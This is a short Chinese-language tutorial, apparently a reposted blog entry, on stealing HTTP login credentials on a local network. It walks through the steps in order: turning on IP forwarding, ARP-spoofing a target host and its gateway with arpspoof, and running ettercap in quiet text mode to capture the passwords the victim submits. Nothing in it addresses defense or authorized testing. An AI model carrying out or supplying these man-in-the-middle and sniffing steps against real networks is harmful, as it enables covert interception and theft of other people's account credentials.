首先，http的前提也是基于arp欺騙的，當(dāng)arp欺騙成功后，方可進(jìn)行。

具體步驟如下：

1.打開終端，先進(jìn)行流量的轉(zhuǎn)發(fā)：echo ?1 ?>/proc/sys/net/ipv4/ip_forward,而echo這個命令是不會有回顯的。所以，我們要用cat命令查看上個路徑文件。

cat ?/proc/sys/net/ipv4/ip_forward,回顯為1則說明命令執(zhí)行成功。

2.接下來進(jìn)行arp欺騙：arpspoof –i 網(wǎng)卡 –t 目標(biāo)ip 目標(biāo)網(wǎng)關(guān)

3.接下來用ettercap進(jìn)行流量嗅探，對賬戶密碼進(jìn)行捕捉。

4.打開終端 輸入：ettercap ?–Tq ??-i 網(wǎng)卡

5.成功之后，當(dāng)目標(biāo)主機(jī)進(jìn)行http賬戶密碼的登錄時 ?我們的終端就會對其進(jìn)行賬戶密碼的獲取。

?

注：ettercap是LINUX下一個強(qiáng)大的欺騙工具，當(dāng)然WINDOWS也能用，你能夠用飛一般的速度創(chuàng)建和發(fā)送偽造的包.讓你發(fā)送從網(wǎng)絡(luò)適配 器到應(yīng)用軟件各種級別的包.綁定監(jiān)聽數(shù)據(jù)到一個本地端口：從一個客戶端連接到這個端口并且能夠為不知道的協(xié)議解碼或者把數(shù)據(jù)插進(jìn)去(只有在arp為基礎(chǔ)模式里才能用)

而上面我們用到的-T ?表示啟動文本模式 –q 表示安靜模式。

轉(zhuǎn)載于:https://www.cnblogs.com/qmfsun/p/6518323.html

總結(jié)

以上是生活随笔為你收集整理的http账户密码的截取的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。